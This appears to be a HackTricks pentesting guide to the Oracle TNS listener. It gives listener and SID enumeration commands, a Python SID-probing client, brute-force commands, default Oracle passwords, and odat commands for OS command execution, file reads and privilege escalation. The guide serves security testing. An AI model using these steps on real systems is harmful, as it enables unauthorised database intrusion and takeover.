# 1521,1522-1529 - Pentesting Oracle TNS Listener

<details>

<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Basic Information

Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation (from [here](https://www.techopedia.com/definition/8711/oracle-database)).

When enumerating Oracle, the first step is to talk to the TNS Listener, which usually sits on the default port (1521/TCP; you may also find secondary listeners on 1522–1529, or on other ports, as in the nmap output below):

```
1521/tcp open  oracle-tns    Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)
1748/tcp open  oracle-tns    Oracle TNS Listener
```

## Summary

1. **Enumerate version** info (search for **known vulns**)
2. **Bruteforce TNS listener** communication (not always needed)
3. **Enumerate**/Bruteforce **SID names** (like database names)
4. **Bruteforce credentials** for valid SID name discovered
5. Try to **execute code**

In order to use the MSF oracle modules you need to install some dependencies: [**Installation**](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md)

## Enumeration

Tools that can be used for this are: nmap, MSF and [tnscmd10g](http://dokfleed.net/files/audit/tnscmd10g.zip).

### TNS listener version

```bash
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
msf> use auxiliary/scanner/oracle/tnslsnr_version
#apt install tnscmd10g
tnscmd10g version -p 1521 -h <IP>
```

Other useful TNS listener commands:

| **Command**  | **Purpose**                                                     |
| ------------ | --------------------------------------------------------------- |
| ping         | Ping the listener                                               |
| version      | Provide output of the listener version and platform information |
| status       | Return the current status and variables used by the listener    |
| services     | Dump service data                                               |
| debug        | Dump debugging information to the listener log                  |
| reload       | Reload the listener configuration file                          |
| save\_config | Write the listener configuration file to a backup location      |
| stop         | Invoke listener shutdown                                        |

If you **receive an error**, it may be because the **TNS versions are incompatible** (use the `--10G` parameter with `tnscmd10g`); if the **error persists**, the listener may be **password protected** (all the [**TNS errors are detailed here**](https://docs.oracle.com/database/121/ERRMG/TNS-00000.htm#ERRMG-GUID-D723D931-ECBA-4FA4-BF1B-1F4FE2EEBAD7)). In that case hydra can brute-force the listener password:

```
hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener
```

The TNS listener can also be vulnerable to **MitM** attacks (TNS Poison). [Check here how to test whether the server is vulnerable and how to perform the attack (all versions up to 12c are)](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/tns-poison.md).

### SID enumeration

#### **What is a SID**

The SID (System Identifier) names a database instance and is essentially the database name; depending on the install you may have one or more default SIDs, or a totally custom DBA-defined SID. Clients usually connect through a **service name** rather than the SID (the two often coincide but need not), and the listener's `status` output lists both.

**In some old versions (it works on 9i)** you can simply ask the listener for the SIDs and it will send them to you:

```bash
tnscmd10g status -p 1521 -h <IP> #The SIDs are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)

#msf1
msf> use auxiliary/scanner/oracle/sid_enum
msf> set rhost <IP>
msf> run
#msf2
msf> use auxiliary/admin/oracle/tnscmd
msf> set CMD (CONNECT_DATA=(COMMAND=STATUS))
msf> set rhost <IP>
msf> run #The SIDs are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
```

If you can't obtain the SIDs this way you will need to bruteforce them:

**SID Bruteforce**

I have merged the nmap and MSF SID lists into this one (without duplicates):

```bash
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 <IP> oracle-sid
patator oracle_login host=<IP> sid=FILE0 0=sids-oracle.txt -x ignore:code=ORA-12505 #ORA-12505 = listener does not know this SID
./odat.py sidguesser -s $SERVER -p 1521 --sids-file=./sids.txt
msf> use auxiliary/admin/oracle/sid_brute #This will use the list located at /usr/share/metasploit-framework/data/wordlists/sid.txt
nmap --script +oracle-sid-brute -p 1521 <IP> #This will use the list located at /usr/share/nmap/nselib/data/oracle-sids
```

In order to use **oracle\_login** with **patator** you need to **install**:

```
pip3 install cx_Oracle --upgrade
```
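The listener commands above (`version`, `status`), the SID extraction from the `status` output and the SID brute force all ride on the same TNS CONNECT packet. The following is an added example (not code from the original page, nor from tnscmd10g, odat or hydra) that hand-builds that packet, parses the listener's DATA/REFUSE replies, pulls `INSTANCE_NAME`/`SERVICE_NAME` out of a `STATUS` answer and classifies the reply to a SID probe the way hydra's `oracle-sid` module does (a REFUSE carrying `ERR=12505` or `12514` means the listener does not know the name; anything else means the SID exists). Hosts, ports and SID candidates are placeholders, and `encode_reply()` fabricates listener replies so the parsing can be exercised offline.

```python
#!/usr/bin/env python3
"""Minimal Oracle TNS client: listener commands and SID probing on the wire.

Added example (not from the page, tnscmd10g, odat or hydra). Host/port/SID
values are placeholders; encode_reply() fabricates listener replies for tests."""
import re
import socket
import struct
import sys

TNS_CONNECT, TNS_ACCEPT, TNS_REFUSE, TNS_REDIRECT, TNS_DATA, TNS_RESEND = 1, 2, 4, 5, 6, 11
CONNECT_DATA_OFFSET = 58  # 8-byte packet header + 50-byte CONNECT body


def build_connect(connect_data, version=314):
    """TNS CONNECT packet carrying `connect_data`. Version 314 is what hydra's
    oracle-sid module sends, tnscmd10g sends 310; most listeners accept either."""
    cdata = connect_data.encode()
    body = struct.pack(
        ">HHHHHHHHHHIBBIIQQ",
        version, 300, 0, 2048, 32767,      # version, compat version, svc options, SDU, TDU
        0x4F98, 0, 1,                      # NT proto characteristics, line turnaround, 1-in-hw
        len(cdata), CONNECT_DATA_OFFSET,   # connect data length / offset from packet start
        0, 0x41, 0x41,                     # max receivable connect data, connect flags 0/1
        0, 0, 0, 0)                        # trace items, trace connection id, padding
    header = struct.pack(">HHBBH", CONNECT_DATA_OFFSET + len(cdata), 0, TNS_CONNECT, 0, 0)
    return header + body + cdata


def parse_packet(pkt):
    """(packet type, text payload) of a listener reply."""
    total, _chk, ptype = struct.unpack(">HHB", pkt[:5])
    if ptype == TNS_DATA:         # 2 bytes of data flags, then payload
        payload = pkt[10:total]
    elif ptype == TNS_REFUSE:     # user reason, system reason, 2-byte length, payload
        payload = pkt[12:12 + struct.unpack(">H", pkt[10:12])[0]]
    else:
        payload = pkt[8:total]
    return ptype, payload.decode("latin-1", "replace")


def encode_reply(ptype, text):
    """DATA or REFUSE packet laid out as the listener sends it (constructed, for offline tests)."""
    data = text.encode()
    body = (b"\x22\x00" + struct.pack(">H", len(data)) if ptype == TNS_REFUSE else b"\x00\x00") + data
    return struct.pack(">HHBBH", 8 + len(body), 0, ptype, 0, 0) + body


def find_values(descriptor, key):
    """All `(KEY=value)` entries of a TNS descriptor, e.g. SERVICE_NAME in a STATUS reply."""
    return sorted(set(re.findall(r"\(%s=([^()]*)\)" % re.escape(key), descriptor)))


def sid_connect_data(host, port, sid):
    """Descriptor for a SID probe; also usable verbatim as an sqlplus connect identifier."""
    return ("(DESCRIPTION=(CONNECT_DATA=(SID=%s)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=)))"
            "(ADDRESS=(PROTOCOL=tcp)(HOST=%s)(PORT=%d)))" % (sid, host, port))


def classify_sid_reply(pkt):
    """'valid', 'invalid' or 'refused:<codes>' for the first reply to a SID probe."""
    ptype, text = parse_packet(pkt)
    if ptype in (TNS_ACCEPT, TNS_REDIRECT, TNS_RESEND):
        return "valid"
    if ptype != TNS_REFUSE:
        return "unexpected:%d" % ptype
    codes = find_values(text, "ERR")
    if "12505" in codes or "12514" in codes:  # listener does not know this SID / service name
        return "invalid"
    return "refused:" + ",".join(codes)       # e.g. 12518: SID is known but hand-off failed


def tns_exchange(host, port, connect_data, timeout=5.0):
    """Send one CONNECT; return reply packets until the listener closes or goes quiet."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connect(connect_data))
        try:
            while (pkt := s.recv(8)) and len(pkt) == 8:
                total = struct.unpack(">H", pkt[:2])[0]
                while len(pkt) < total and (chunk := s.recv(total - len(pkt))):
                    pkt += chunk
                replies.append(pkt)
        except socket.timeout:
            pass
    return replies


if __name__ == "__main__":
    host, port = sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 1521  # placeholders
    for cmd in ("VERSION", "STATUS"):
        parsed = [parse_packet(p) for p in tns_exchange(host, port, "(CONNECT_DATA=(COMMAND=%s))" % cmd)]
        text = "".join(t for ptype, t in parsed if ptype == TNS_DATA)
        print(cmd, "->", text[:400] or "no DATA reply (protected listener or version mismatch)")
        if cmd == "STATUS":
            print("SIDs:", find_values(text, "INSTANCE_NAME"), "services:", find_values(text, "SERVICE_NAME"))
    for sid in sys.argv[3:] or ["ORCL", "XE"]:  # candidate SIDs, placeholders
        reply = tns_exchange(host, port, sid_connect_data(host, port, sid))
        print(sid, classify_sid_reply(reply[0]) if reply else "no reply")
```

Run it as `python3 tns.py <IP> 1521 ORCL XE ...` to issue `VERSION` and `STATUS` and then probe each candidate SID; feed a wordlist by expanding the argument list. A password-protected or version-mismatched listener shows up as a REFUSE instead of DATA for the commands, which is the same symptom the tnscmd10g error above describes.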

## **Targeting Accounts**

**Got a SID?** Excellent, now let's move to the next task and extract user account information. From this point you can connect to the listener and brute-force credentials.

**Metasploit** `scanner/oracle/oracle_login` has a built-in dictionary of the **most popular default user account values**, presented as login:password. By the way, such default entries are one of the most common and serious security problems in Oracle.

**Nmap** can also help here with the script `oracle-brute`. Note that this script **combines the logins and passwords**, that is, it tries every login against every password, so it takes quite a while!

### **Default Passwords**

Below are some of the default passwords associated with Oracle:

* **DBSNMP/DBSNMP** — the Intelligent Agent uses this to talk to the db server (changing it takes some work)
* **SYS/CHANGE\_ON\_INSTALL** — default sysdba account up to and including Oracle 9; as of version 10g this has to be changed at install time
* **PCMS\_SYS/PCMS\_SYS** — default account
* **WMSYS/WMSYS** — default account
* **OUTLN/OUTLN** — default account
* **SCOTT/TIGER** — default demo account

Other **default passwords** can be found [here ](http://www.petefinnigan.com/default/oracle_default_passwords.htm)and [here](https://cirt.net/passwords?vendor=Oracle).

Versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to **offline brute force** (the O5LOGON authentication weakness, CVE-2012-3137: the listener hands out the AUTH\_SESSKEY and salt before the password is verified, so the hash can be cracked offline without generating failed logins). [**Read more about this technique here.**](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md)

### User/Pass bruteforce

Different tools ship **different user/pass lists** for Oracle:

* **oscanner:** */usr/share/oscanner/accounts.default* (169 lines)
* **MSF-1:** from *admin/oracle/oracle\_login*: */usr/share/metasploit-framework/data/wordlists/oracle\_default\_passwords.csv* (598 lines)
* **MSF-2:** from *scanner/oracle/oracle\_login*: */usr/share/metasploit-framework/data/wordlists/oracle\_default\_userpass.txt* (568 lines)
* **Nmap:** */usr/share/nmap/nselib/data/oracle-default-accounts.lst* (687 lines)

I have **mixed** all of them and **removed duplicates:**

### [Brute Force](/dashboard/generic-methodologies-and-resources/brute-force.md#oraclesql)

Now that you **know a valid SID and valid credentials**, you can connect to the database with ***sqlplus***; to install it follow these steps:

[Installation](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md)

To login using known credentials (Easy Connect syntax; the name after the `/` is resolved by the listener as a **service name**, which usually matches the SID but does not have to):

```bash
sqlplus <username>/<password>@<ip_address>/<SID>
```

If the TNS Listener is on a non-default port (e.g. TCP/1522):

```bash
sqlplus <username>/<password>@<ip_address>:<port>/<SID>
```

If you only know the SID and the service name differs (you get ORA-12514 on connect), pass a full connect descriptor instead of the Easy Connect string: `<username>/<password>@"(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=<ip_address>)(PORT=<port>))(CONNECT_DATA=(SID=<SID>)))"`.

If an **account has system database privileges (sysdba) or system operator privileges (sysoper)** you may wish to try the following:

```bash
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba'
#Example:
sqlplus SYSTEM/MANAGER@192.168.0.2/ORCL 'as sysdba'
```

## **All in One**

**An interesting tool is oscanner**, which will try to find a valid SID, then brute-force valid credentials and try to extract some information:

```bash
#apt install oscanner
oscanner -s <IP> -P <PORT>
```

Another tool that will do all of this it [**odat**](https://github.com/quentinhardy/odat):

```bash
git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py --help #There shouldn't be any problems in Kali
./odat.py all -s <IP> -p <PORT>
./odat.py all -s <IP> -p <PORT> -d <SID> #To bruteforce accounts for that SID
```

With these options (*-s* and *-p*), ODAT will first **search for valid SIDs** (System Identifiers). You can configure the guessing methods (i.e. word-list or brute-force attack); by default, ODAT uses a big word list and then runs a small brute-force attack.

If ODAT **finds at least one SID** (e.g. *ORCL*), it will **search for valid Oracle accounts** on **each SID found**. You can specify some options for the credentials (e.g. *--accounts-file*, *--accounts-files*, *--login-as-pwd*).

For **each valid account** (e.g. *SYS*) **on each valid instance** (SID), ODAT will report **what that Oracle user can do** (e.g. reverse shell, read files, become DBA).

[**Wiki odat**](https://github.com/quentinhardy/odat/wiki)

## Remote Code Execution

There are at least two different ways to execute OS commands from the database: Java stored procedures and the DBMS\_SCHEDULER package (external tables, below, are a third). You can also reach them through a SQL injection in a web application, provided, of course, that the database user the application runs as has sufficient privileges. At this stage, I highly recommend preparing the Oracle Database Attacking Tool: [ODAT](https://github.com/quentinhardy/odat).

### Install ODAT

```bash
git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py #There shouldn't be any problems in Kali
```

### Execute Code via Java Stored Procedure

```bash
./odat.py java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND
```

[More details here](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md#rce-java-store-procedure)

### Execute code via Scheduler

```bash
./odat.py dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123>>C:\hacK"
```

[More details here](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md#rce-scheduler)

### Execute code via External Tables

```bash
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"
```

`odat.py externaltable` requires the `CREATE ANY DIRECTORY` privilege, which by default is granted only to the DBA role, because it runs the file from an arbitrary directory rather than only from one you already own (the manual version of this attack requires fewer privileges).

[More details here.](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md#rce-external-tables)

## Read/Write files

```bash
./odat.py utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/test" token.txt token.txt
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/test" "my4.txt" "my"
```

[More details here](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md#read-write-files)

## Elevating Privileges

[More details here](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md#elevating-privileges)

You can use the [privesc](https://github.com/quentinhardy/odat/wiki/privesc) module from odat to escalate privileges. In that link you can find **several ways to escalate privileges using odat.**

```bash
./odat.py privesc -s $SERVER -d $SID -U $USER -P $PASSWORD -h #Get module help
```

The `lt_findricset_cursor` module exploits a SQL injection in `SYS.LT.FINDRICSET` (Oracle Workspace Manager) via cursor injection to run SQL with SYS privileges (e.g. grant DBA to the current user). The vulnerability was tested on Oracle 10.1.0.3.0, should work through 10.1.0.5.0 and supposedly on 11g, and was fixed with the Oracle Critical Patch Update of October 2007.

```bash
msf> use auxiliary/sqli/oracle/lt_findricset_cursor
```

## Free Virtual Environment for testing

If you want to practice attacking Oracle databases, the safest way is to register for the Oracle Developer Days Virtualbox VM:

{% embed url="http://www.oracle.com/technetwork/database/enterprise-edition/databaseappdev-vm-161299.html" %}

Most of the information in this post was extracted from: <https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573> and from <https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/>

Other interesting **references**:

<http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html>

## HackTricks Automatic Commands

```
Protocol_Name: Oracle    #Protocol Abbreviation if there is one.
Port_Number:  1521     #Comma separated if there is more than one.
Protocol_Description: Oracle TNS Listener         #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for Oracle
  Note: |
    Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation

    #great oracle enumeration tool
    navigate to https://github.com/quentinhardy/odat/releases/
    download the latest
    tar -xvf odat-linux-libc2.12-x86_64.tar.gz
    cd odat-libc2.12-x86_64/
    ./odat-libc2.12-x86_64 all -s 10.10.10.82

    for more details check https://github.com/quentinhardy/odat/wiki

    https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener

Entry_2:
  Name: Nmap
  Description: Nmap with Oracle Scripts
  Command: nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}
```

